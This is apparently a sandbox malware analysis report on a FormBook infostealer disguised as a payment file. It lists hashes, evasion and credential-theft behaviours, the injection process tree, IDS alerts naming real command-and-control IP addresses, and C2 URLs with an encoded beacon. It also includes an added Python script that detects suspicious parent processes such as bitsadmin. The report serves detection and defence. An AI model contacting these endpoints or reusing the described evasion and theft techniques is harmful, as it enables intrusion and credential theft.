
Windows Analysis Report
Latest advice payment.exe

Overview

General Information

Sample name: Latest advice payment.exe
Analysis ID: 1567859
MD5: b1ff44d20bc312e62d55daf8a8cf5b07
SHA1: c470001e130a55b1081ba071c47c0e1e60570453
SHA256: 5b359667005091665aad2d9773ea103cbdb88c47a1a9a7b44243d83ef90b8a15
Tags: exe, user-James_inthe_box

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Latest advice payment.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\Latest advice payment.exe" MD5: B1FF44D20BC312E62D55DAF8A8CF5B07)
    • svchost.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Latest advice payment.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CWtKbasqHVKAO.exe (PID: 4388 cmdline: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 8164 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • CWtKbasqHVKAO.exe (PID: 768 cmdline: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further memory-dump matches not listed)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , CommandLine: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, NewProcessName: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, OriginalFileName: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 8164, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" , ProcessId: 768, ProcessName: CWtKbasqHVKAO.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine|base64offset|contains: iq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ParentImage: C:\Users\user\Desktop\Latest advice payment.exe, ParentProcessId: 7336, ParentProcessName: Latest advice payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ProcessId: 7396, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", CommandLine|base64offset|contains: iq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ParentImage: C:\Users\user\Desktop\Latest advice payment.exe, ParentProcessId: 7336, ParentProcessName: Latest advice payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Latest advice payment.exe", ProcessId: 7396, ProcessName: svchost.exe
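The process tree and the Sigma hits above amount to three host-side signals: svchost.exe started by something other than services.exe, a process whose parent is bitsadmin.exe, and a process whose command line names a different executable than its image (the svchost.exe instance carries the sample's own path, which is how the report renders the injection). The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules' own filter lists; it re-implements those three checks over process-creation events constructed from the tree above. The explorer.exe parent of PID 7336, the benign svchost.exe control (PID 1234) and both allowlists are this example's assumptions. One caveat the report itself supplies: the binary-string section lists a Joe Security FakeChrome .pdb path as originating from CWtKbasqHVKAO.exe, so that random file name and directory belong to the sandbox's browser decoy rather than to the malware and should not be lifted as indicators.

```python
"""Host-side checks for the process tree and Sigma hits shown in this report.

Added example; not part of the Joe Sandbox report and not the Sigma rules'
own filter lists. Three checks:
  1. svchost.exe whose parent is not a known service-host launcher
  2. any process whose parent is a LOLBin such as bitsadmin.exe
  3. a command line that names a different executable than the process image
     (the svchost.exe instance above carries the sample's own path)
"""
import ntpath

# Parents that legitimately launch svchost.exe (assumption; tune per estate)
SVCHOST_OK_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "svchost.exe",
                      "ngen.exe", "tiworker.exe", "rpcnet.exe"}

# Binaries that should practically never parent another process (assumption)
SUSPICIOUS_PARENTS = {"bitsadmin.exe", "minesweeper.exe", "winver.exe",
                      "charmap.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return ntpath.basename(path.strip().strip('"')).lower()


def exe_from_cmdline(cmdline: str) -> str:
    """Executable named at the start of a command line, quoted or bare."""
    cmd = cmdline.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def check_event(ev: dict) -> list[str]:
    """Return the list of findings for one process-creation event."""
    findings = []
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    if image == "svchost.exe" and parent not in SVCHOST_OK_PARENTS:
        findings.append(f"uncommon svchost parent: {parent}")
    if parent in SUSPICIOUS_PARENTS:
        findings.append(f"suspicious parent process: {parent}")
    claimed = basename(exe_from_cmdline(ev["CommandLine"]))
    if claimed and claimed != image:
        findings.append(f"command line names {claimed} but image is {image}")
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> findings for every event that triggered a check."""
    report = {}
    for ev in events:
        findings = check_event(ev)
        if findings:
            report[ev["ProcessId"]] = findings
    return report


# Constructed events; Image/CommandLine/ParentImage values are copied from
# the process tree above. The explorer.exe parent of PID 7336 and the
# benign svchost.exe control (PID 1234) are assumptions.
EVENTS = [
    {"ProcessId": 7336,
     "Image": r"C:\Users\user\Desktop\Latest advice payment.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Latest advice payment.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 7396,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Latest advice payment.exe"',
     "ParentImage": r"C:\Users\user\Desktop\Latest advice payment.exe"},
    {"ProcessId": 768,
     "Image": r"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe",
     "CommandLine": r'"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe" ',
     "ParentImage": r"C:\Windows\SysWOW64\bitsadmin.exe"},
    {"ProcessId": 1234,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for pid, findings in scan(EVENTS).items():
        print(pid, "->", "; ".join(findings))
```

Run against Sysmon Event ID 1 or Windows 4688 data the field names map directly (Image, ParentImage, CommandLine). The third check is the one that separates the hollowed svchost.exe from a noisy allowlist miss: a legitimate service host never carries another binary's path on its command line.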
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T23:27:37.679953+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49808 | 161.97.168.245 | 80 | TCP
2024-12-03T23:28:03.251083+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49868 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:19.294902+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49907 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:35.059248+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49947 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:50.156059+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | TCP
2024-12-03T23:29:04.924338+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50021 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:19.934138+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50033 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:35.274693+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50038 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:50.452738+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50042 | 209.74.77.107 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T23:27:37.679953+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49808 | 161.97.168.245 | 80 | TCP
2024-12-03T23:28:03.251083+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49868 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:19.294902+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49907 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:35.059248+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49947 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:50.156059+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | TCP
2024-12-03T23:29:04.924338+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:19.934138+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50033 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:35.274693+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50038 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:50.452738+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50042 | 209.74.77.107 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T23:27:54.985524+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49847 | 27.124.4.246 | 80 | TCP
2024-12-03T23:27:57.735515+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49854 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:00.532358+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49860 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:11.122946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49889 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:13.813553+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49895 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:16.485474+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49900 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:27.110367+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49927 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:29.782267+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49934 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:32.454058+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49940 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:42.023341+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49965 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:44.743434+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49970 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:47.368148+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49977 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:57.141359+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 172.67.145.234 | 80 | TCP
2024-12-03T23:28:59.557104+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:02.485088+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:12.000623+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:14.601977+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50031 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:17.310071+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50032 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:27.125540+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50034 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:29.797405+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50036 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:32.471179+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50037 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:42.352365+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50039 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:45.015365+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50040 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:47.917261+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50041 | 209.74.77.107 | 80 | TCP


                AV Detection

Source: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P | Avira URL Cloud: Label: malware
Source: http://www.soainsaat.xyz/rum2/ | Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2 | Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/ | Avira URL Cloud: Label: malware
Source: Latest advice payment.exe | ReversingLabs: Detection: 47%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Latest advice payment.exe | Joe Sandbox ML: detected
Source: Latest advice payment.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CWtKbasqHVKAO.exe, 00000007.00000000.2349023099.000000000065E000.00000002.00000001.01000000.00000005.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000000.2505529018.000000000065E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49808 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49808 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49854 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49860 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49889 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49847 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49907 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49907 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49900 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49895 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49868 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49868 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49927 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49940 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49934 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49947 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49947 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49965 -> 185.27.134.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49970 -> 185.27.134.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 185.27.134.144:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49983 -> 185.27.134.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49983 -> 185.27.134.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 172.67.145.234:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50021 -> 172.67.145.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 172.67.145.234:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 172.67.145.234:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 172.67.167.146:80
